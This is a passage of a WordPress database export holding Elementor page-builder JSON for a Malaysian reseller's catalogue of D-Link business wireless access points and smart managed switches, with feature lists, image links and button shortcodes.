\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"219\",\"right\":\"219\",\"bottom\":\"219\",\"left\":\"219\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7389,3384,'_elementor_version','2.5.14'),(7390,3384,'_elementor_edit_mode','builder'),(7393,3385,'_wp_page_template','template-fullwidth.php'),(7394,3385,'_elementor_template_type','post'),(7395,3385,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central 